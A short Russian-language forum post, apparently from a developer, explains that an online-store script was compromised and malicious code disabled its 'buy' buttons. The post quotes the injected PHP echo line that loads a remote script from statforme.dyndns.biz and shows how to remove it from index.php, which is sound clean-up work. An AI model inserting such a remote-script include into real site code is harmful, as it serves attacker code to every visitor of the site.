Сегодня ко мне обратились заказчики интернет магазина "mag-shop.ru" У них перестали работать кнопки купить. Я 3 часа разбирался, и выяснил следующее. В нашем с вами скрипте интернет-магазина есть дыра через которую злоумышленники добавлят свой код. Масштабы пока оценить невозможно. Разобрался пока как удалить вредноносный код который отключает кнопку купить.
Посмотрите исходный код. В самом низу появляется код <script src="http://statforme.dyndns.biz/rss.js"></script> это и есть вирус.
Удалить его можно отредактировав в корне сайта index.php в самом низу
// Output
$response->output();
echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';
?>
Нужно сделать
// Output
$response->output();
?>